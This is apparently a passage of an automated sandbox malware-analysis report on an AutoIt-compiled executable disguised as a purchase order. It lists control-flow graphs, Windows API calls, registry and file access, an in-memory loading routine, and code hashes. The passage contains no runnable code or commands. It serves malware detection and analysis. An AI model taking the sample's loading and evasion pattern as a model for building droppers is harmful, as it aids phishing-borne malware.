                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                        • String ID:
                                                        • API String ID: 2378138488-0
                                                        • Opcode ID: bfbec230fec2ea80eb3431d088b20b32f4b5a15455046816ced51662c3949cc7
                                                        • Instruction ID: a12050512474e2d4afa107cd171027ae8467e53250345d76578ddcdeda7272f9
                                                        • Opcode Fuzzy Hash: bfbec230fec2ea80eb3431d088b20b32f4b5a15455046816ced51662c3949cc7
                                                        • Instruction Fuzzy Hash: 97C13AB1900219AFDF25EF95CC81EDEBBBCAF49314F1080AAF609E6151DB309A449F65

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 957 c43742-c43762 959 c43764-c43767 957->959 960 c437c2-c437c4 957->960 961 c437c8 959->961 962 c43769-c43770 959->962 960->959 963 c437c6 960->963 964 c437ce-c437d1 961->964 965 cb1e00-cb1e2e call c42ff6 call c5e312 961->965 966 c43776-c4377b 962->966 967 c4382c-c43834 PostQuitMessage 962->967 968 c437ab-c437b3 DefWindowProcW 963->968 969 c437f6-c4381d SetTimer RegisterWindowMessageW 964->969 970 c437d3-c437d4 964->970 1004 cb1e33-cb1e3a 965->1004 972 cb1e88-cb1e9c call c84ddd 966->972 973 c43781-c43783 966->973 974 c437f2-c437f4 967->974 975 c437b9-c437bf 968->975 969->974 979 c4381f-c4382a CreatePopupMenu 969->979 976 cb1da3-cb1da6 970->976 977 c437da-c437ed KillTimer call c43847 call c4390f 970->977 972->974 996 cb1ea2 972->996 980 c43836-c43840 call c5eb83 973->980 981 c43789-c4378e 973->981 974->975 989 cb1da8-cb1daa 976->989 990 cb1ddc-cb1dfb MoveWindow 976->990 977->974 979->974 997 c43845 980->997 985 c43794-c43799 981->985 986 cb1e6d-cb1e74 981->986 994 cb1e58-cb1e68 call c855bd 985->994 995 c4379f-c437a5 985->995 986->968 992 cb1e7a-cb1e83 call c7a5f3 986->992 998 cb1dcb-cb1dd7 SetFocus 989->998 999 cb1dac-cb1daf 989->999 990->974 992->968 994->974 995->968 995->1004 996->968 997->974 998->974 999->995 1000 cb1db5-cb1dc6 call c42ff6 999->1000 1000->974 1004->968 1008 cb1e40-cb1e53 call c43847 call c44ffc 1004->1008 1008->968
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00C437B3
                                                        • KillTimer.USER32(?,00000001), ref: 00C437DD
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C43800
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C4380B
                                                        • CreatePopupMenu.USER32 ref: 00C4381F
                                                        • PostQuitMessage.USER32(00000000), ref: 00C4382E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 129472671-2362178303
                                                        • Opcode ID: 131a53368e22a6dd4462861a1f9e73a5ca6ba649da4918c800e923fd64f3f49c
                                                        • Instruction ID: 392fc5c440b37d26f39267a6bb06ee722cd4c9889d0eec634a3d181f54c83c0f
                                                        • Opcode Fuzzy Hash: 131a53368e22a6dd4462861a1f9e73a5ca6ba649da4918c800e923fd64f3f49c
                                                        • Instruction Fuzzy Hash: 384104F92042C6ABDB146B68DE4EFBA3695FBC4301F440129FA96D22D1DA609F40D772

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00C43E79
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00C43E88
                                                        • LoadIconW.USER32(00000063), ref: 00C43E9E
                                                        • LoadIconW.USER32(000000A4), ref: 00C43EB0
                                                        • LoadIconW.USER32(000000A2), ref: 00C43EC2
                                                          • Part of subcall function 00C44024: LoadImageW.USER32(00C40000,00000063,00000001,00000010,00000010,00000000), ref: 00C44048
                                                        • RegisterClassExW.USER32(?), ref: 00C43F30
                                                          • Part of subcall function 00C43F53: GetSysColorBrush.USER32(0000000F), ref: 00C43F86
                                                          • Part of subcall function 00C43F53: RegisterClassExW.USER32(00000030), ref: 00C43FB0
                                                          • Part of subcall function 00C43F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C43FC1
                                                          • Part of subcall function 00C43F53: InitCommonControlsEx.COMCTL32(?), ref: 00C43FDE
                                                          • Part of subcall function 00C43F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C43FEE
                                                          • Part of subcall function 00C43F53: LoadIconW.USER32(000000A9), ref: 00C44004
                                                          • Part of subcall function 00C43F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C44013
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: fc3104b768e7cb699e6dd852cb9c34b730fb2a99467217f845efe9ead0695131
                                                        • Instruction ID: b438447a284e105155f301b973d8e238f5dced9cc859b592c87223a7363028b7
                                                        • Opcode Fuzzy Hash: fc3104b768e7cb699e6dd852cb9c34b730fb2a99467217f845efe9ead0695131
                                                        • Instruction Fuzzy Hash: 2621FAB4D00344ABDB04DFA9EC49B9DBBF5FB48310F10812AE619E73A0D77556449BA2

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1021 c6acb3-c6ace0 call c66ac0 call c67cf4 call c66986 1028 c6ace2-c6acf8 call c6e880 1021->1028 1029 c6acfd-c6ad02 1021->1029 1037 c6af52-c6af57 call c66b05 1028->1037 1031 c6ad08-c6ad0f 1029->1031 1032 c6ad42-c6ad51 GetStartupInfoW 1031->1032 1033 c6ad11-c6ad40 1031->1033 1035 c6ad57-c6ad5c 1032->1035 1036 c6ae80-c6ae86 1032->1036 1033->1031 1035->1036 1039 c6ad62-c6ad79 1035->1039 1040 c6af44-c6af50 call c6af58 1036->1040 1041 c6ae8c-c6ae9d 1036->1041 1043 c6ad80-c6ad83 1039->1043 1044 c6ad7b-c6ad7d 1039->1044 1040->1037 1045 c6aeb2-c6aeb8 1041->1045 1046 c6ae9f-c6aea2 1041->1046 1048 c6ad86-c6ad8c 1043->1048 1044->1043 1050 c6aebf-c6aec6 1045->1050 1051 c6aeba-c6aebd 1045->1051 1046->1045 1049 c6aea4-c6aead 1046->1049 1054 c6adae-c6adb6 1048->1054 1055 c6ad8e-c6ad9f call c66986 1048->1055 1056 c6af3e-c6af3f 1049->1056 1053 c6aec9-c6aed5 GetStdHandle 1050->1053 1051->1053 1057 c6aed7-c6aed9 1053->1057 1058 c6af1c-c6af32 1053->1058 1060 c6adb9-c6adbb 1054->1060 1066 c6ada5-c6adab 1055->1066 1067 c6ae33-c6ae3a 1055->1067 1056->1036 1057->1058 1061 c6aedb-c6aee4 GetFileType 1057->1061 1058->1056 1063 c6af34-c6af37 1058->1063 1060->1036 1064 c6adc1-c6adc6 1060->1064 1061->1058 1065 c6aee6-c6aef0 1061->1065 1063->1056 1068 c6ae20-c6ae31 1064->1068 1069 c6adc8-c6adcb 1064->1069 1070 c6aef2-c6aef8 1065->1070 1071 c6aefa-c6aefd 1065->1071 1066->1054 1072 c6ae40-c6ae4e 1067->1072 1068->1060 1069->1068 1073 c6adcd-c6add1 1069->1073 1075 c6af05 1070->1075 1076 c6aeff-c6af03 1071->1076 1077 c6af08-c6af1a InitializeCriticalSectionAndSpinCount 1071->1077 1078 c6ae74-c6ae7b 1072->1078 1079 c6ae50-c6ae72 1072->1079 1073->1068 1074 c6add3-c6add5 1073->1074 1080 c6add7-c6ade3 GetFileType 1074->1080 1081 c6ade5-c6ae1a InitializeCriticalSectionAndSpinCount 1074->1081 1075->1077 1076->1075 1077->1056 1078->1048 1079->1072 1080->1081 1082 c6ae1d 1080->1082 1081->1082 1082->1068
                                                        APIs
                                                        • __lock.LIBCMT ref: 00C6ACC1
                                                          • Part of subcall function 00C67CF4: __mtinitlocknum.LIBCMT ref: 00C67D06
                                                          • Part of subcall function 00C67CF4: EnterCriticalSection.KERNEL32(00000000,?,00C67ADD,0000000D), ref: 00C67D1F
                                                        • __calloc_crt.LIBCMT ref: 00C6ACD2
                                                          • Part of subcall function 00C66986: __calloc_impl.LIBCMT ref: 00C66995
                                                          • Part of subcall function 00C66986: Sleep.KERNEL32(00000000,000003BC,00C5F507,?,0000000E), ref: 00C669AC
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00C6ACED
                                                        • GetStartupInfoW.KERNEL32(?,00CF6E28,00000064,00C65E91,00CF6C70,00000014), ref: 00C6AD46
                                                        • __calloc_crt.LIBCMT ref: 00C6AD91
                                                        • GetFileType.KERNEL32(00000001), ref: 00C6ADD8
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00C6AE11
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 1426640281-0
                                                        • Opcode ID: a299a0e0d7196acc4ea7825c14c1feb019095d4ce2579a8c8b0b82d922f56e26
                                                        • Instruction ID: 9dcc295fb5bf8d405aa8603335c06ac955aed849425e741f7c3f6bce21bd9fb8
                                                        • Opcode Fuzzy Hash: a299a0e0d7196acc4ea7825c14c1feb019095d4ce2579a8c8b0b82d922f56e26
                                                        • Instruction Fuzzy Hash: E181B1719053458FDB24CFA8C8806ADBBF0AF09324B28426DD4AAFB3D1D7359902CF56

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1083 c436b8-c43728 CreateWindowExW * 2 ShowWindow * 2
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,ICTRLCREATETREEVIEW,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C436E6
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C43707
                                                        • ShowWindow.USER32(00000000,?,?,?,?,00C43AA3,?), ref: 00C4371B
                                                        • ShowWindow.USER32(00000000,?,?,?,?,00C43AA3,?), ref: 00C43724
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$ICTRLCREATETREEVIEW$edit
                                                        • API String ID: 1584632944-1087800450
                                                        • Opcode ID: 3388a13e509ed7c5842e3102f1c191ce404a3b9d8ad0ac2d0ae52ce41e091023
                                                        • Instruction ID: 40346984ac995de0eeab110df0da5436eb1256f5065fbc134c8e621e05fde240
                                                        • Opcode Fuzzy Hash: 3388a13e509ed7c5842e3102f1c191ce404a3b9d8ad0ac2d0ae52ce41e091023
                                                        • Instruction Fuzzy Hash: 6FF0DA799403D07AE7315757AC48F772EBDE7C6F60B01802FFA4DE62A0C5611895DAB0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1084 17cd438-17cd4e6 call 17cae58 1087 17cd4ed-17cd513 call 17ce348 CreateFileW 1084->1087 1090 17cd51a-17cd52a 1087->1090 1091 17cd515 1087->1091 1098 17cd52c 1090->1098 1099 17cd531-17cd54b VirtualAlloc 1090->1099 1092 17cd665-17cd669 1091->1092 1093 17cd6ab-17cd6ae 1092->1093 1094 17cd66b-17cd66f 1092->1094 1100 17cd6b1-17cd6b8 1093->1100 1096 17cd67b-17cd67f 1094->1096 1097 17cd671-17cd674 1094->1097 1101 17cd68f-17cd693 1096->1101 1102 17cd681-17cd68b 1096->1102 1097->1096 1098->1092 1103 17cd54d 1099->1103 1104 17cd552-17cd569 ReadFile 1099->1104 1105 17cd70d-17cd722 1100->1105 1106 17cd6ba-17cd6c5 1100->1106 1111 17cd695-17cd69f 1101->1111 1112 17cd6a3 1101->1112 1102->1101 1103->1092 1113 17cd56b 1104->1113 1114 17cd570-17cd5b0 VirtualAlloc 1104->1114 1109 17cd724-17cd72f VirtualFree 1105->1109 1110 17cd732-17cd73a 1105->1110 1107 17cd6c9-17cd6d5 1106->1107 1108 17cd6c7 1106->1108 1115 17cd6e9-17cd6f5 1107->1115 1116 17cd6d7-17cd6e7 1107->1116 1108->1105 1109->1110 1111->1112 1112->1093 1113->1092 1117 17cd5b7-17cd5d2 call 17ce598 1114->1117 1118 17cd5b2 1114->1118 1121 17cd6f7-17cd700 1115->1121 1122 17cd702-17cd708 1115->1122 1120 17cd70b 1116->1120 1124 17cd5dd-17cd5e7 1117->1124 1118->1092 1120->1100 1121->1120 1122->1120 1125 17cd5e9-17cd618 call 17ce598 1124->1125 1126 17cd61a-17cd62e call 17ce3a8 1124->1126 1125->1124 1132 17cd630 1126->1132 1133 17cd632-17cd636 1126->1133 1132->1092 1134 17cd638-17cd63c CloseHandle 1133->1134 1135 17cd642-17cd646 1133->1135 1134->1135 1136 17cd648-17cd653 VirtualFree 1135->1136 1137 17cd656-17cd65f 1135->1137 1136->1137 1137->1087 1137->1092
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 017CD509
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017CD72F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                        • Instruction ID: 7e74b2bca5640d612156a459945e32ae5f22bb247e94354033c98273e0de196f
                                                        • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                        • Instruction Fuzzy Hash: B6A1F774E00209EBDB24CFE4C999BAEFBB5BF48704F20816DE515BB280D7759A41CB94

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1193 c449fb-c44a25 call c4bcce RegOpenKeyExW 1196 cb41cc-cb41e3 RegQueryValueExW 1193->1196 1197 c44a2b-c44a2f 1193->1197 1198 cb4246-cb424f RegCloseKey 1196->1198 1199 cb41e5-cb4222 call c5f4ea call c447b7 RegQueryValueExW 1196->1199 1204 cb423d-cb4245 call c447e2 1199->1204 1205 cb4224-cb423b call c46a63 1199->1205 1204->1198 1205->1204
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00C44A1D
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00CB41DB
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00CB421A
                                                        • RegCloseKey.ADVAPI32(?), ref: 00CB4249
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: QueryValue$CloseOpen
                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                        • API String ID: 1586453840-614718249
                                                        • Opcode ID: edc77c71d51ae3be059f1ebdec1ace0e62885b44a3382b76baff0b5e1f6c9d3f
                                                        • Instruction ID: eb5b005c9095fb1a454a87ec4507589b4c190a79e753040f2c3ba0f6cb33617a
                                                        • Opcode Fuzzy Hash: edc77c71d51ae3be059f1ebdec1ace0e62885b44a3382b76baff0b5e1f6c9d3f
                                                        • Instruction Fuzzy Hash: 69113071A00108BEDB04ABA8CD86EEF7BBCEF04344F104069F507D6191EB709E42E750

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1324 17cd208-17cd337 call 17cae58 call 17cd0f8 CreateFileW 1331 17cd33e-17cd34e 1324->1331 1332 17cd339 1324->1332 1335 17cd355-17cd36f VirtualAlloc 1331->1335 1336 17cd350 1331->1336 1333 17cd3ee-17cd3f3 1332->1333 1337 17cd371 1335->1337 1338 17cd373-17cd38a ReadFile 1335->1338 1336->1333 1337->1333 1339 17cd38c 1338->1339 1340 17cd38e-17cd3c8 call 17cd138 call 17cc0f8 1338->1340 1339->1333 1345 17cd3ca-17cd3df call 17cd188 1340->1345 1346 17cd3e4-17cd3ec ExitProcess 1340->1346 1345->1346 1346->1333
                                                        APIs
                                                          • Part of subcall function 017CD0F8: Sleep.KERNELBASE(000001F4), ref: 017CD109
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017CD32D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: 5A0U6YE3V4I49YURP79ZR13124
                                                        • API String ID: 2694422964-3410800093
                                                        • Opcode ID: 4cf754d7eea61e4f0a62a8db218325796c258ad13df14d9321a7ec40cca621cc
                                                        • Instruction ID: 147e7fa65df56eb5ce7769f7c570ba9153f69ca5ceb14758018b41279bae934f
                                                        • Opcode Fuzzy Hash: 4cf754d7eea61e4f0a62a8db218325796c258ad13df14d9321a7ec40cca621cc
                                                        • Instruction Fuzzy Hash: BE517F30D04289DAEB12DBE8C858BEEBBB89F19704F04419DE6447B2C1D6B54B45CBA6
                                                        APIs
                                                        • _memset.LIBCMT ref: 00C4522F
                                                        • _wcscpy.LIBCMT ref: 00C45283
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C45293
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00CB3CB0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                        • String ID: Line:
                                                        • API String ID: 1053898822-1585850449
                                                        • Opcode ID: e004f5eef9b9aa5e60198dd7a4b6428c966c5ae3c02f2688b3975dc8509ed19c
                                                        • Instruction ID: a880040c1e3cbdc485f86a1cb9aab9cd8c540503e52f384ff7087e587ecd8e7a
                                                        • Opcode Fuzzy Hash: e004f5eef9b9aa5e60198dd7a4b6428c966c5ae3c02f2688b3975dc8509ed19c
                                                        • Instruction Fuzzy Hash: 3031AD75508780AFD335EB60DC42FDE7BE8BB44310F10461EF59992192EBB0A648DBA7
                                                        APIs
                                                          • Part of subcall function 00C441A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C439FE,?,00000001), ref: 00C441DB
                                                        • _free.LIBCMT ref: 00CB36B7
                                                        • _free.LIBCMT ref: 00CB36FE
                                                          • Part of subcall function 00C4C833: __wsplitpath.LIBCMT ref: 00C4C93E
                                                          • Part of subcall function 00C4C833: _wcscpy.LIBCMT ref: 00C4C953
                                                          • Part of subcall function 00C4C833: _wcscat.LIBCMT ref: 00C4C968
                                                          • Part of subcall function 00C4C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00C4C978
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                        • API String ID: 805182592-1757145024
                                                        • Opcode ID: ea19131e1a1e2f0d5f661ce2dfd46cd1e287588db7931d67117fcf0bb3d7a8e4
                                                        • Instruction ID: fb1aa2164d884746ad48196997674b3df55f03b65a94d95bf9f3a68f7b0f0e2b
                                                        • Opcode Fuzzy Hash: ea19131e1a1e2f0d5f661ce2dfd46cd1e287588db7931d67117fcf0bb3d7a8e4
                                                        • Instruction Fuzzy Hash: 75918271910259EFCF14EFA5CC919EEB7B4FF18310F14442AF826AB291DB30AA45DB54
                                                        APIs
                                                          • Part of subcall function 00C45374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00D01148,?,00C461FF,?,00000000,00000001,00000000), ref: 00C45392
                                                          • Part of subcall function 00C449FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00C44A1D
                                                        • _wcscat.LIBCMT ref: 00CB2D80
                                                        • _wcscat.LIBCMT ref: 00CB2DB5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$FileModuleNameOpen
                                                        • String ID: \$\Include\
                                                        • API String ID: 3592542968-2640467822
                                                        • Opcode ID: b89c08eb28b7eb9a022101ee30bd6092df1381028e5bc28fb8f894330c77180d
                                                        • Instruction ID: 8fceae22b9cd4fc52934d6ef257d319354a98738392cf739056ee0225aec6a68
                                                        • Opcode Fuzzy Hash: b89c08eb28b7eb9a022101ee30bd6092df1381028e5bc28fb8f894330c77180d
                                                        • Instruction Fuzzy Hash: 5D516F724063409BC714EF65E985AAEB7F8FF99300B50452EF649D3361EB709608DB63
                                                        APIs
                                                        • __getstream.LIBCMT ref: 00C634FE
                                                          • Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00C63539
                                                        • __wopenfile.LIBCMT ref: 00C63549
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                        • String ID: <G
                                                        • API String ID: 1820251861-2138716496
                                                        • Opcode ID: be2bd49189d2bb010a45ddd379b3ca968d7b7b5fa696aad90bba8fab692b59eb
                                                        • Instruction ID: 511cfae834dba3da7c23c491bb084c783f82fc4f6feb819e00cc73fbddb5c493
                                                        • Opcode Fuzzy Hash: be2bd49189d2bb010a45ddd379b3ca968d7b7b5fa696aad90bba8fab692b59eb
                                                        • Instruction Fuzzy Hash: 4511CA71A00206ABDB72BF758CC267E7BA4AF45750B148925E415D7181EF34CB11B7A1
                                                        APIs
